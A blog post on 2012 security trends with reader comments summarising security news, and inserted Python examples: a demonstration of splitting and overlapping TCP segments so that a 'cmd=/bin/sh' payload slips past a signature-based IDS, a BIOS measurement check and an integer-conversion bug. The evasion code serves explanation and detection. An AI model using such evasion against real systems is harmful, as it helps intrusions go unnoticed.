Security trends for 2012

Here is my collection of security trends for 2012 from different sources:

Windows XP will be the biggest security threat in 2012 according to Sean Sullivan, security advisor at F-Secure: “People seem to be adding new systems without necessarily abandoning their old XP machines, which is great news for online criminals, as XP continues to be their favourite target.”

F-Secure also says that it might not be long before cyber criminals turn their attention to tablet devices. Attacks against mobile devices have become more common and I expect this to continue this year as well.

Americans are more susceptible to online scams than they believe, a study finds. A recent survey from The Ponemon Institute and PC Tools dives into this question and reveals a real gap between how aware Americans think they are of scams and how likely they actually are to fall for them.

Fake antivirus scams have plagued Windows and Mac OS X during the last couple of years, and now it seems that such scams have spread to Android. Nearly all new mobile malware in Q3 2011 was targeted at Android. When antivirus software becomes a universally accepted requirement (the way it is on Windows), has the platform failed and missed the whole point of being a mobile operating system?


Cyber criminals are developing more sophisticated attacks and the police will counterattack.

Mobile phone surveillance will increase and more details of it will surface. Last year’s findings included location data collecting smartphones, Carrier IQ phone spying busted and a police surveillance system to monitor mobile phones. In the USA the Patriot Act lets the authorities investigate anything, anywhere, without a warrant; now they are on your devices and can monitor everything. Leaked Memo Says Apple Provides Backdoor To Governments: “in exchange for the Indian market presence” mobile device manufacturers, including RIM, Nokia, and Apple (collectively defined in the document as “RINOA”) have agreed to provide backdoor access on their devices.

The article Geo-location tagging in smartphones to potentially cause major security risks says that geo-location tagging security issues are likely to be a major issue in 2012, and that many smartphone users are unaware of the potentially serious security consequences of their use of the technology. When smartphone images are uploaded to the Internet (to portals such as Facebook or Flickr) there is a strong chance that the GPS location data embedded in them is uploaded as well. This information could subsequently be misused by third parties.

You need to find your balance between freedom and security (Vapauden ja turvallisuuden tasapaino, “The balance of freedom and security”). Usernames are poured out for all to see; passwords and personal identification numbers get published. Knowledge of access management is more important than ever: who has the right to know what, when and where, and in which role? Access, identity and role management are essential for protecting the whole system, and the implementation of such systems is still far from complete.

When designing networked services, security should be taken into account at the planning stage rather than at the end of implementation. Even a secure network and information system cannot operate in a vacuum.


The reliability of server certificates will face more and more problems. We may see more certificate authority bankruptcies due to cyber attacks against them. Certificate attacks that have so far focused on PC web browsers are now proven to be effective against mobile browsers as well.

Stonesoft says that advanced evasion techniques (AETs) will be a major threat. Stonesoft discovered that with certain evasion techniques (particularly when combined in specific combinations) they could sneak common exploits past many IDS/IPS systems (including their own at the time, last summer). Using the right tool set (including a custom TCP/IP stack) attackers could sneak past our best defences. This is real, and they foresee a not too distant future where things like botnet kits will have this as a checkbox feature.
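To make concrete why combined evasions get past per-packet inspection, here is an added example in Python. It is not Stonesoft’s tooling and not code from the original post: the TCP segments, the “/bin/sh” signature string and the two reassembly policies are constructed for illustration. It shows a naive matcher that inspects each segment on its own missing a signature split across two segments, and an overlap where two TCP stacks that disagree on which copy of a byte wins end up with different streams, so an inspector can be steered to a harmless reading while the target sees the payload.

```python
from dataclasses import dataclass
from typing import Iterable, List

# Constructed example: a payload substring that a signature-based IDS looks for.
SIGNATURE = b"/bin/sh"


@dataclass
class Segment:
    seq: int      # byte offset of this segment within the TCP stream
    data: bytes


def naive_match(segments: Iterable[Segment]) -> bool:
    """Per-packet inspection: every segment is checked on its own."""
    return any(SIGNATURE in s.data for s in segments)


def reassemble(segments: Iterable[Segment], policy: str = "first") -> bytes:
    """Rebuild the byte stream from segments in arrival order.

    policy="first": a byte already received is kept, later overlaps are ignored.
    policy="last":  a later overlapping segment overwrites earlier bytes.
    Real TCP stacks differ in which rule they apply, which is exactly what
    overlap-based evasions exploit.
    """
    buf = {}
    for s in segments:
        for i, b in enumerate(s.data):
            off = s.seq + i
            if policy == "last" or off not in buf:
                buf[off] = b
    # Only the contiguous prefix starting at offset 0 is deliverable to the application.
    out = bytearray()
    off = 0
    while off in buf:
        out.append(buf[off])
        off += 1
    return bytes(out)


def stream_match(segments: List[Segment], policy: str = "first") -> bool:
    """Inspection after reassembly under the given policy."""
    return SIGNATURE in reassemble(segments, policy)


def conflicting_overlaps(segments: Iterable[Segment]) -> bool:
    """Flag streams where overlapping segments carry different bytes for the same offset.
    The host-side result is ambiguous, so an inspector should not trust either reading."""
    seen = {}
    for s in segments:
        for i, b in enumerate(s.data):
            off = s.seq + i
            if off in seen and seen[off] != b:
                return True
            seen[off] = b
    return False


# Evasion 1 (constructed): the signature is split across two segments.
SPLIT = [
    Segment(0, b"GET /cgi-bin/x?cmd=/bin"),
    Segment(23, b"/sh HTTP/1.0\r\n"),
]

# Evasion 2 (constructed): the same offsets are sent twice with different content.
# A host that keeps the first copy sees "/bin/sh"; an inspector that lets the
# later copy overwrite sees only harmless bytes.
OVERLAP = [
    Segment(0, b"cmd="),
    Segment(4, b"/bin/sh\n"),
    Segment(4, b"/usr/bi\n"),   # decoy of the same length
]

if __name__ == "__main__":
    print("split:   naive", naive_match(SPLIT), "reassembled", stream_match(SPLIT))
    print("overlap: first-wins", stream_match(OVERLAP, "first"),
          "last-wins", stream_match(OVERLAP, "last"),
          "ambiguous", conflicting_overlaps(OVERLAP))
```

The practical takeaway is the last function: an inspector that cannot know the target’s reassembly policy should at least flag conflicting overlaps as suspicious rather than silently pick one reading. The same ambiguity exists at the IP fragment layer and inside protocol decoders, which is why stacking several such techniques is so effective.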

The rise of printer malware is real. Printer malware: print a malicious document, expose your whole LAN says that sending a printer a document that contains a malicious version of the printer’s firmware can send your sensitive documents anywhere on the Internet. Researchers at Columbia University have discovered a new class of security flaws that could allow hackers to remotely control printers over the Internet. Potential scenario: send a resume to HR, wait for them to print it, take over the network and pwn the company. HP does have firmware update software for its printers, and HP Refutes Inaccurate Claims; Clarifies on Printer Security. I wonder how many more years until that old chain letter, where some new insidious virus infects everything from your graphics card to your monitor cable, comes true.

Unauthorized changes in the BIOS could allow or be part of a sophisticated, targeted attack on an organization, allowing an attacker to infiltrate an organization’s systems or disrupt their operations. How Do You Protect PCs from BIOS Attacks? The U.S. National Institute of Standards and Technology (NIST) has drafted a new computer-security publication that provides guidance for computer manufacturers, suppliers, and security professionals who must protect personal computers as they start up “out of the box”: “BIOS Integrity Measurement Guidelines,” NIST Special Publication 800-155.
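As an added illustration of the measurement chain that BIOS integrity measurement relies on (example code written for this post, not NIST’s or any vendor’s; the firmware component names and blobs are constructed), the snippet below measures each boot component, extends the measurements into a single register the way a TPM PCR extend does (new = H(old || measurement)), and checks a reported event log and register against a golden value recorded for the approved firmware. Because the register is a hash chain, any modified, added, removed or reordered component changes the final value, and the event log tells the verifier which component diverged.

```python
import hashlib
from typing import List, Optional, Tuple

Log = List[Tuple[str, str]]   # (component name, hex measurement)


def measure(component: bytes) -> bytes:
    """Measurement of one boot component: its SHA-256 digest."""
    return hashlib.sha256(component).digest()


def extend(register: bytes, measurement: bytes) -> bytes:
    """PCR-style extend: new = H(old || measurement). Nothing can be removed and
    order matters, so the final value commits to the whole sequence."""
    return hashlib.sha256(register + measurement).digest()


def boot_measurements(components: List[Tuple[str, bytes]]) -> Tuple[Log, bytes]:
    """Simulate a measured boot: return the event log and the final register value."""
    reg = bytes(32)                      # register starts at all zeros
    log: Log = []
    for name, blob in components:
        m = measure(blob)
        log.append((name, m.hex()))
        reg = extend(reg, m)
    return log, reg


def replay_log(log: Log) -> bytes:
    """Recompute the register from the event log alone."""
    reg = bytes(32)
    for _name, m_hex in log:
        reg = extend(reg, bytes.fromhex(m_hex))
    return reg


def verify(log: Log, reg: bytes, golden: bytes) -> bool:
    """Two checks: the log replays to the reported register (the log is consistent
    with it) and the register equals the golden value for approved firmware."""
    return replay_log(log) == reg and reg == golden


def first_divergence(log: Log, golden_log: Log) -> Optional[str]:
    """Name of the first component whose measurement differs from the golden log."""
    for (name, m), (_gname, g) in zip(log, golden_log):
        if m != g:
            return name
    if len(log) != len(golden_log):
        return "length mismatch"
    return None


# Constructed sample firmware images (stand-ins for real BIOS code and configuration).
GOOD_FIRMWARE = [
    ("boot_block", b"BOOTBLOCK v1.02"),
    ("main_bios", b"MAIN BIOS IMAGE 2011-11"),
    ("option_rom", b"NIC OPTION ROM 3.1"),
]
TAMPERED_FIRMWARE = [
    ("boot_block", b"BOOTBLOCK v1.02"),
    ("main_bios", b"MAIN BIOS IMAGE 2011-11"),
    ("option_rom", b"NIC OPTION ROM 3.1 + implant"),   # one modified component
]

# Golden values would be recorded by the manufacturer or the IT department from known-good firmware.
GOLDEN_LOG, GOLDEN_REGISTER = boot_measurements(GOOD_FIRMWARE)

if __name__ == "__main__":
    log, reg = boot_measurements(TAMPERED_FIRMWARE)
    print("tampered boot accepted:", verify(log, reg, GOLDEN_REGISTER))
    print("first divergent component:", first_divergence(log, GOLDEN_LOG))
```

The check that matters in practice is the second one in verify: a register reported by the platform must be reproducible from the log, otherwise either the log or the register has been forged. A real deployment gets the register from a TPM and the golden values from a trusted inventory rather than from the module itself.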

According to Stonesoft, security problems threaten lives, and 2012 may be the first year in which lives are lost because of security offences. Whether this happens remains to be seen, the company says, but the risk comes from attacks against industrial SCADA systems at targets such as hospitals or automated drug delivery systems. I already posted about SCADA system security issues around a month ago.


  1. Tomi Engdahl says:

    Managing Your Network Security
    http://www.datacenterjournal.com/it/managing-your-network-security/

    Like it or not, a critical task for your company’s success is proper management of your network security. The question is not if a malicious party will attack your IT infrastructure, but when—and that means you must take measures to prepare for and, hopefully, thwart such attacks. This effort takes time and money, but so does the alternative. When a hacker, for instance, steals confidential information (say, about customers), not only is your company’s reputation harmed, resulting in lost business, but you may also face fines or other costs associated with regulatory compliance. And this says nothing about subsequent efforts to repair any damage that might have been caused to the network or data contained therein.

    The critical first step of managing your network security is recognizing what exactly is threatened by malicious software and third parties

    Communications with other networks and users—such as your customers—can be great for business, but it opens your network to a host of remote threats. Attacks on your network from the Internet may involve attempts at intrusion, malware such as worms and spyware, or denial of service (DoS) via floods of “garbage” requests. In this case, some helpful tools are antivirus software (encompassing virus, spyware, rootkits and all the other myriad malicious devices used by attackers), a strong firewall, intrusion prevention and DoS mitigation. Already, you may realize you have a significant task ahead of you in protecting your network, but there’s more.

    Direct attacks on your network are not the only threat. You must also protect communications when they leave your company network on their way to customers or other networks (say, a remote company site). To this end, virtual private networks and encryption help prevent intercepted messages from being read or convincingly altered. Protocols like SSL and IPSec help secure connections to prevent spoofing and other attacks.

    And don’t forget to secure your wireless connections. An unsecured wireless router can give anyone with a laptop and a wireless card access to your network regardless of your security measures on the hard-wired front.

    Unfortunately, there’s still more. If you have all the above covered, you can still be vulnerable if, say, an employee loses a device such as a USB drive or smartphone—particularly if it’s a BYOD (bring your own device) gadget.

    A Helpful Management Tool: Clear Security Policies

    Perhaps the greatest chink in any network security armor is the human factor. An employee opening a suspicious attachment (like those ones from the accounting department with the spreadsheet you supposedly requested) can easily nullify thousands of dollars of investment in network security

    Forward Thinking

    One of the keys to successfully securing your network is to do more than just respond to attacks: you must continually update your antivirus software (as well as other applications) to stay up to date with the latest threats, but you should also consider analytics of traffic entering or leaving your network, as this can indicate areas of weakness or even a compromised portion of the network.

    Cloud Security

    Many companies are turning to the cloud to supplement their existing IT infrastructure. Whether this is your approach or you are making a more wholesale move to the cloud, security should be a top concern. The cloud is not necessarily more inherently unsecure than on-premises infrastructure, but the level of security can and does vary from provider to provider.

    Reply
  2. Tomi Engdahl says:

    Java Zero-Day Exploit on Sale for ‘Five Digits’
    http://krebsonsecurity.com/2012/11/java-zero-day-exploit-on-sale-for-five-digits/

    Miscreants in the cyber underground are selling an exploit for a previously undocumented security hole in Oracle’s Java software that attackers can use to remotely seize control over systems running the program, KrebsOnSecurity has learned.

    The flaw, currently being sold by an established member of an invite-only Underweb forum, targets an unpatched vulnerability in Java JRE 7 Update 9, the most recent version of Java (the seller says this flaw does not exist in Java 6 or earlier versions).

    According to the vendor, the weakness resides within the Java class “MidiDevice.Info,” a component of Java that handles audio input and output.

    The price of any exploit is ultimately whatever the market will bear, but this is roughly in line with the last Java zero-day exploit that was being traded and sold on the underground.

    In August, I wrote about a newly discovered Java exploit being folded into the BlackHole exploit kit, quoting the author of that crimeware tool as saying that “the price of such an exploit if it were sold privately would be about $100,000.”

    Reply
  4. Tomi Engdahl says:

    Hack could let browsers use cloud to carry out big attacks on the cheap
    Exploit abuses cloud services to do large-scale computations.
    http://arstechnica.com/security/2012/11/hack-could-let-browsers-use-cloud-to-carry-out-big-attacks-on-the-cheap/

    Scientists have devised a browser-based exploit that allows them to carry out large-scale computations on cloud-based services for free, a hack they warn could be used to wage powerful online attacks cheaply and anonymously.

    The method, described in a research paper scheduled to be presented at next month’s Computer Security Applications Conference, uses the Puffin mobile browser to push computationally intensive jobs onto a cloud-based service that was never intended for such purposes. Normally, Puffin and other so-called cloud-based browsers are used only to accelerate the loading of Web pages on mobile devices by rendering JavaScript, images, and text from disparate sources on a server and only then delivering it to the smartphone or tablet. That’s more efficient than relying on mobile devices with limited computing power to render such content themselves.

    “By rendering Web pages in the cloud, the providers of cloud browsers can become open computation centers, much in the same way that poorly configured mail servers become open relays,” the scientists wrote in the paper. “The example applications shown in this paper were an academic exercise targeted at demonstrating the capabilities of cloud browsers. There is great potential to abuse these services for other purposes.”

    While their proof-of-concept attack abuses the Puffin service for Android and iOS devices, they say similar cloud infrastructure is also vulnerable, including services that work with Amazon’s Silk browser for Kindle devices, Cloud Browse from AlwaysOn Technologies, and Opera Mini.

    The exploit works by breaking up jobs into large numbers of much smaller jobs and feeding them to multiple instances of their custom-made browser, which then push them into the cloud. To make the job easier, they created code libraries modeled on MapReduce, a Google-designed programming framework for performing distributed computing on large clusters of computers. Their JavaScript-based code broke up large tasks into much smaller tasks and then distributed them to individual browser instances. They relied on the free Bitly URL shortening service to allow one task to share data with another. A similar process was then used to reassemble the completed jobs and deliver the results from the servers back to their browser.

    The researchers said cloud browser providers are already taking steps to prevent abuse on their services, but that more needs to be done. They wrote: “Based on our findings, we observe that the computational ability made freely available by cloud browsers allows for an open compute center that is valuable and warrants substantially more careful protection.”

    Reply
  5. Tomi Engdahl says:

    Burglar suspected of using Arduino-Onity hack to rob hotel rooms
    http://hackaday.com/2012/11/29/burglar-suspected-of-using-arduino-onity-hack-to-rob-hotel-rooms/

    Can anyone argue against this being the least-secure hotel room lock on the market? Regular readers will recognize it as an Onity key card lock. A few months back a glaring flaw in the security was exposed that allows these locks to be opened electronically in less than a second. So we are not surprised to hear that a series of hotel room robberies in Houston are suspected to have been performed using this technique.

    She said that if there’s a vulnerability that’s not being fixed people have a right to know about it.

    Reply
  6. Tomi Engdahl says:

    The Bluejacking, Bluesnarfing, Bluebugging Blues: Bluetooth Faces Perception of Vulnerability
    http://www.eetimes.com/design/communications-design/4017819/The-Bluejacking-Bluesnarfing-Bluebugging-Blues-Bluetooth-Faces-Perception-of-Vulnerability

    Is Bluetooth secure? Inquiring minds want to know. Ever since the first Bluetooth-enabled mobile phones started appearing a couple of years ago, numerous reports have suggested that the wireless technology is vulnerable to snooping.

    First, the popular press jumped onto bluejacking, which lets complete strangers send anonymous and unsolicited messages to certain Bluetooth phones. Then came reports that some phones were vulnerable to bluesnarfing, which makes it possible for someone to access a phone wirelessly without the owner’s knowledge and download the stored phonebook and calendar and sometimes more. More recently, reports have described bluebugging, in which someone can theoretically take complete wireless control of virtually any Bluetooth phone and use it for all kinds of illicit purposes.

    What the articles don’t tell you, though, is just how unlikely it is for any of these bluesomething attacks to affect you. Some early Bluetooth phones did have some security holes, but they were due to faulty implementations, not Bluetooth weaknesses, and the phones’ manufacturers have since released firmware upgrades that fix them.

    This isn’t to say, of course, that Bluetooth is absolutely, totally secure. The jury is still out, actually, on just how secure Bluetooth is.

    One thing that has become clear, though, is that Bluetooth security and user convenience involve some serious tradeoffs

    Vulnerable?
    So, then, Bluetooth’s vulnerability comes down to a few key points:

    Early, faulty Bluetooth implementations, since corrected.
    Users choosing short PINs that are easy to crack with brute-force computing.
    Users unwisely pairing Bluetooth devices in public places.
    Motivated, dedicated privacy snoops willing and able to use special, and sometimes expensive, hardware and software.

    And, of course, user convenience. It’s easier for users to leave Bluetooth turned on and discoverable. It’s easier to use a short PIN than a long one.

    But users concerned about security will give up a little convenience to get it. And, increasingly, manufacturers of Bluetooth phones, understanding the tradeoff between security and convenience, will design their phones in ways that push users toward security. They don’t want to be accused of marketing vulnerable technology, after all. They’ve had enough of that already.

    Reply
  7. Tomi Engdahl says:

    Stockholm stock exchange paralyzed by order for -6 futures
    http://www.geek.com/articles/geek-cetera/stockholm-stock-exchange-paralyzed-by-order-for-6-futures-20121129/

    Stock exchange systems around the world rely on computers and their ability to handle orders quickly, and more importantly, correctly. However, on Wednesday the Stockholm Stock Exchange was brought to a grinding halt by an order for -6 futures (which could be an order for stocks, bonds, or currency, for example).

    That’s clearly a mistake on someone’s part, but surely the stock exchange system should have been able to cope, and why did it cause such a big problem?

    My understanding of it is this: the reason boils down to how the system reacts to a negative number. It will attempt to convert -6 into a positive number it can then use to trade with. The problem is, -6 gets changed to 4,294,967,290 when converted to an unsigned integer.

    the cost of the transaction to the buyer would be about $460 trillion. That’s many times the gross domestic product of Sweden

    The stock exchange managed to get back online a day later on Thursday, with the problem being described as a technical error. But this just goes to show, while we rely on computers heavily, it only takes the simplest of errors to break them.

    Reply
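The conversion behind that number, as an added example (not code from the exchange or from the article; the per-order limit in it is a made-up value): Python integers do not wrap, so struct is used to emulate storing the quantity in a 32-bit unsigned slot, next to a validating parser that rejects the order before any arithmetic happens.

```python
import struct
from typing import Optional


def reinterpret_as_uint32(n: int) -> int:
    """Store a 32-bit signed integer and read it back as unsigned, which is what happens
    when C code copies an int into an unsigned int (or into a quantity field declared
    unsigned). Valid for -2**31 <= n < 2**31; struct raises for anything outside."""
    return struct.unpack("<I", struct.pack("<i", n))[0]


def quantity_error(field: str, max_qty: int = 1_000_000) -> Optional[str]:
    """Validate an order-quantity field before it touches any arithmetic.
    Returns None if acceptable, otherwise the reason for rejection.
    max_qty is a constructed per-order limit; a real venue would take it
    from the instrument's risk settings."""
    try:
        qty = int(field.strip())
    except ValueError:
        return f"quantity is not an integer: {field!r}"
    if qty <= 0:
        return f"quantity must be positive, got {qty}"
    if qty > max_qty:
        return f"quantity {qty} exceeds the per-order limit {max_qty}"
    return None


def book_order_unchecked(field: str) -> int:
    """The failure mode: the sign is never checked and the value lands in an unsigned slot."""
    return reinterpret_as_uint32(int(field))


def book_order_checked(field: str) -> int:
    """Rejects bad input up front; only validated quantities reach the matching engine."""
    err = quantity_error(field)
    if err is not None:
        raise ValueError(err)
    return int(field)


if __name__ == "__main__":
    print("unchecked -6 becomes", book_order_unchecked("-6"))   # 4294967290 == 2**32 - 6
    print("checked -6 rejected:", quantity_error("-6"))
```

The two's-complement reading of -6 is 0xFFFFFFFA, which is 2**32 - 6 = 4,294,967,290, the figure quoted above. The sanity limit in quantity_error is the part that would also have caught a mistyped but positive quantity of the same size.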
  8. Tomi Engdahl says:

    Who’s using ‘password’ as a password? TOO MANY OF YOU
    Study of hacked websites reveals top 25 common passphrases
    http://www.theregister.co.uk/2012/12/03/lame_passwords_still_rife/

    A study to find the top 25 leaked passwords of 2012 has revealed too many people are still using “password”, “123456” and “12345678” for their login credentials.

    Mobile security biz SplashData’s roundup put “123456” in the number two slot for 2012; the same password was used by 37 per cent of all user accounts at the Anonymous-hacked Greek finance ministry.

    Reply
  9. Tomi Engdahl says:

    MySQL gains new batch of vulns
    Overruns, privileges, DoS and more
    http://www.theregister.co.uk/2012/12/04/mysql_new_vulns/

    A series of posts on ExploitDB by an author signing as “King Cope” reveal a new set of MySQL vulnerabilities – along with one issue that could just be a configuration issue.

    The vulnerabilities, which emerged on Saturday, include a denial-of-service demonstration, a Windows remote root attack, two overrun attacks that work on Linux, and one privilege escalation attack, also on Linux.

    Red Hat has assigned CVEs to the vulnerabilities, but at the time of writing, Oracle has not commented on the issues.

    Reply
  10. Tomi Engdahl says:

    App designed for safe sending of naughty selfies is rife with risks
    Teenager subtitles: App makes selfies safe BLAH BLAH BLAH
    http://www.theregister.co.uk/2012/11/08/snapchat/

    A smartphone app touted as a safe way to exchange naked pictures and saucy texts poses a huge privacy risk.

    Snapchat is available for both iPhone and Android devices, and is marketed towards teenagers and young adults. The app lets senders control how long a message or picture can be viewed, before it expires after a maximum of 10 seconds.

    The idea is that a picture is only visible for 10 seconds – limiting the opportunity for others to forward it around the school campus, or (worse) upload it to Facebook or an image sharing site.

    The problem is that this doesn’t stop anyone receiving a message taking a screenshot of their device and creating their own copy of the image, providing they are nimble fingered enough.

    “A less high-tech method to grab the image is to simply take a photograph of the phone that has just received the nude photo.”

    Snapchat, which received a 12+ rating from Apple for “Infrequent/Mild Sexual Content or Nudity”, is ahead of Instagram and only behind YouTube in the list of top free photography apps in Apple’s online store. The firm claims its iOS version alone has been used to share over 1 billion photos (“snaps”).

    US child safety online Mary Kay Hoal has also expressed concerns that youngsters might be fooled into thinking that Snapchat is a safe way to share nude and inappropriate photographs of themselves.

    “Sharing a naked photo of yourself with someone via the internet is putting yourself at dangerous risk of embarrassment, humiliation or serious bullying,” Cluley concludes.

    Reply
  11. Tomi Engdahl says:

    Want it Secure? Target Both Design and Data Security
    http://rtcmagazine.com/articles/view/102841

    In today’s increasingly connected world, security applies to servers as well as mobile and remote embedded devices. The latter are often exposed to physical tampering while data travelling over networks is exposed to compromise and hacking. Security depends on securing the complete connected universe.

    As defense, commercial and civil network infrastructures become increasingly dependent on arrays of Internet-connected computers, they are becoming increasingly susceptible to attack from hostile nations, non-governmental terrorist groups and cyber criminals. This silent digital war’s constantly escalating cycle of intrusion/interception threats and countermeasures poses multiple challenges to designers, since adding robust security features to a design can substantially impact the complexity, power consumption and cost of a system. These challenges include supporting the computational complexity required to run advanced cryptographic algorithms; providing secure insertion and storage of encryption keys, and authenticating and encrypting data exchanged over public network connections.

    Reply
  12. Tomi Engdahl says:

    Security in the Cloud
    Using military-grade security technology to help protect the enterprise.
    http://rtcmagazine.com/articles/view/102813

    As more enterprises look to the cloud as a mechanism for both data sharing and data streaming, key concerns of security of the cloud continue to emerge, even for private and community clouds. We are moving from a distributed data model, where the attack vectors for sensitive information have been very broad but the consequence of a single attack is small, to a cloud-based approach where the attack vector is small but the impact of a single attack can be huge. Consequently, we need to establish much greater security in the cloud, especially when sensitive information or infrastructure is at risk.

    Reply
  13. Tomi Engdahl says:

    New 25-GPU Monster Devours Strong Passwords In Minutes
    http://it.slashdot.org/story/12/12/05/0623215/new-25-gpu-monster-devours-strong-passwords-in-minutes

    “A presentation at the Passwords^12 Conference in Oslo, Norway, has moved the goalposts on password cracking yet again. Speaking on Monday, researcher Jeremi Gosney (a.k.a epixoip) demonstrated a rig that leveraged the Open Computing Language (OpenCL) framework and a technology known as Virtual Open Cluster (VCL) to run the HashCat password cracking program across a cluster of five 4U servers equipped with 25 AMD Radeon GPUs communicating at 10 Gbps and 20 Gbps over Infiniband switched fabric. Gosney’s system elevates password cracking to the next level, and effectively renders even the strongest passwords protected with weaker encryption algorithms, like Microsoft’s LM and NTLM, obsolete.”

    “Gosney’s cluster cranks out more than 77 million brute force attempts per second against MD5crypt.”

    Reply
  15. Tomi Engdahl says:

    25 GPUs brute force 348 billion hashes per second to crack your passwords
    http://hackaday.com/2012/12/06/25-gpus-brute-force-348-billion-hashes-per-second-to-crack-your-passwords/

    It’s our understanding that the video game industry has long been a driving force in new and better graphics processing hardware. But they’re not the only benefactors to these advances. As we’ve heard before, a graphics processing unit is uniquely qualified to process encryption hashes quickly (we’ve seen this with bitcoin mining). This project strings together 25 GPU cards in 5 servers to form a super fast brute force attack. It’s so fast that the actual specs are beyond our comprehension. How can one understand 348 billion hashes per second?

    The testing was used on a collection of password hashes using LM and NTLM protocols.

    Reply
  16. Tomi Engdahl says:

    How the Eurograbber attack stole 36 million euros
    http://www.net-security.org/malware_news.php?id=2344

    Check Point has revealed how a sophisticated malware attack was used to steal an estimated €36 million from over 30,000 customers of over 30 banks in Italy, Spain, Germany and Holland over summer this year.

    The theft used malware to target the PCs and mobile devices of banking customers. The attack also took advantage of SMS messages used by banks as part of customers’ secure login and authentication process.

    The attack worked by infecting victims’ PCs and mobiles with a modified version of the Zeus trojan. When victims attempted online bank transactions, the process was intercepted by the trojan.

    With victims’ PCs and mobile devices compromised, the attackers could intercept and hijack all the victims’ banking transactions, including the key to completing the transaction: the bank’s SMS to the customer containing the ‘transaction authentication number’ (TAN). With the account number, password, and TAN, the attackers were able to stealthily transfer funds out of victims’ accounts while victims were left with the impression that their transaction had completed successfully.

    The attack involved 10 stages, starting with an initial infection by a modified version of Zeus

    Zeus Botnet Eurograbber Steals $47 Million
    http://www.informationweek.com/security/attacks/zeus-botnet-eurograbber-steals-47-millio/240143837
    Sophisticated, targeted attack campaign enabled criminals to steal an estimated $47 million from more than 30,000 corporate and private banking customers.

    That finding comes from a new report published by security vendors Versafe and Check Point Software Technologies. They’ve dubbed the related attack campaign as “Eurograbber,” and notified banks and law enforcement agencies in the affected countries.

    The malware used by attackers is a customized version of the Zitmo Trojan spyware application. Zitmo is short for “Zeus in the mobile,” and the malware is designed to defeat the two-factor authentication systems employed by some banks. To do that, a companion, smartphone version of the malware intercepts the one-time transaction authentication number (TAN) that banks send to a customer’s mobile device, via SMS, which the customer must then enter into a banking website prompt to authorize a money transfer.

    The Zitmo Trojan can infect a PC if a user clicks on a malicious link in a spam or phishing email, or on a link on a website that’s been compromised by attackers. The malicious Trojan application then remains dormant until a user logs into a targeted financial firm’s website. “The next time the bank customer logs in to their bank account, the Eurograbber Trojan intercepts their banking session and injects a JavaScript into the customer’s banking page,” according to the report. “This malicious JavaScript informs the customer of the ‘security upgrade’ and instructs them on how to proceed.”

    The security upgrade page requests that the user indicate which mobile operating system their smartphone uses — Android, BlackBerry, iOS (iPhone), Symbian (Nokia) or other — as well as their mobile phone number. This information is then relayed to a drop zone, which is a publicly writable folder on a Web server — which attackers may have previously hijacked — where they store information about every infected bank customer’s PC, including account numbers, log-in credentials, and one-time passwords.

    Inside Eurograbber: How SMS Was Used to Pilfer Millions
    http://www.esecurityplanet.com/malware/inside-eurograbber-how-sms-was-used-to-pilfer-millions.html

    The Eurograbber Trojan employs a feature designed to help users feel more secure about their online banking to rip them off.

    In one of the most sophisticated banking attacks ever publicly reported, over 36 million euros ($47 million U.S.) were stolen from at least 30,000 banking customers across Europe. The attack, dubbed “Eurograbber,” leveraged mobile platforms and a variant of the Zeus platform to do its dirty work.

    Darrell Burkey, director of IPS at security vendor Check Point, explained to eSecurity Planet that the attack was a multi-stage process designed to work within the context of online banking in Europe. Many European banks leverage a two factor authentication approach for logging into their online portals. In addition to a standard password, an SMS message is typically sent to the user providing the required second factor for authentication.

    “The bank customer has some level of comfort because they initiated the activity by going to their banking website, which is where the alert popped up,” Burkey said. “The Trojan requests that the user provides their mobile phone number in order to complete a required upgrade.”

    A user who falls for the ruse and provides the mobile phone number will then receive an SMS on their phone, purportedly from their bank. That SMS directs the user to click a link which downloads a Zeus mobile Trojan.

    “At that point the user is basically owned, and the next time they access their bank account the attack initiates a transaction to transfer money out of the account to the attacker’s account,” Burkey said.

    The Eurograbber attack was discovered by Check Point and security vendor Versafe after their customers were hit by the attack. Eyal Gruner, security engineer at Versafe, told eSecurity Planet that when the Eurograbber attempted to inject code into a banking website used by customers of theirs, an alert was triggered.

    Reply
  17. Tomi Engdahl says:

    Apple Hires Hacker Who Helped Save Windows From Security Hell
    http://www.wired.com/wiredenterprise/2012/12/apple-hires-hacker/

    Apple has hired a noted computer security researcher who helped Microsoft lock down its Windows operating system.

    Kristin Paget — formerly known as Chris Paget — now works on Apple’s security team. Just over five years ago, she was part of a small team of elite hackers brought in by Microsoft to lock down Windows Vista.

    Criminals have long preferred to focus their attacks on Microsoft’s operating system — still the world’s most popular — but lately, there have been signs that they’re eying Apple’s Mac OS X too. And Apple, slowly, has been trying to make inroads into the security community. This summer, an Apple engineer spoke at the Black Hat security conference for the first time.

    Until this past summer, Paget had been chief hacker at Recursion Ventures, a company that specializes in hardware security.

    Reply
  18. Tomi Engdahl says:

    Kill the Password: Why a String of Characters Can’t Protect Us Anymore
    http://www.wired.com/gadgetlab/2012/11/ff-mat-honan-password-hacker/

    It’s not a well-kept secret, either. Just a simple string of characters—maybe six of them if you’re careless, 16 if you’re cautious—that can reveal everything about you.

    Your email. Your bank account. Your address and credit card number. Photos of your kids or, worse, of yourself, naked. The precise location where you’re sitting right now as you read these words. Since the dawn of the information age, we’ve bought into the idea that a password, so long as it’s elaborate enough, is an adequate means of protecting all this precious data. But in 2012 that’s a fallacy, a fantasy, an outdated sales pitch. And anyone who still mouths it is a sucker—or someone who takes you for one.

    No matter how complex, no matter how unique, your passwords can no longer protect you.

    Reply
  19. Tomi Engdahl says:

    Windows XP can retire – or not?
    Windows XP: The future raises different opinions among experts.

    Windows XP was published in 2001 and support for it is announced to end in April 2014. After that it will no longer get any security or other updates.

    Some security researchers forecast that Microsoft implemented its intentions, even if it would jeopardize the security of millions of customers. Others are of the opinion that the company does not plan to, despite no choice but to continue to support the product.

    XP support ending the worst case could cause major problems for the entire internet. Such an example would be a massive denial of service attack, which in turn would force Microsoft to publish a correction, despite the expiry of the due date.

    “It would be a huge blow to the image of Microsoft’s Security”

    Gartner’s John Pescatore, the border must be drawn somewhere, after all, Microsoft support XP on more than anything else.

    “I do not think they change their mind. If they did that, they would lose all credibility.”

    Pescatore sees one possible reason why this support would be extended – and it is not related to information security, but to Windows’ shrinking share of the equipment:

    “They can continue to update the publication, in order to obtain kept closed, even those customers who are using XP.”

    Source: http://www.tietoviikko.fi/kaikki_uutiset/windows+xp+paasee+elakkeelle++tai+sitten+ei/a862063?s=r&wtm=tietoviikko/-07122012&

    Reply
  20. Tomi Engdahl says:

    Assessing the Effectiveness of Antivirus Solutions
    http://www.imperva.com/docs/HII_Assessing_the_Effectiveness_of_Antivirus_Solutions.pdf

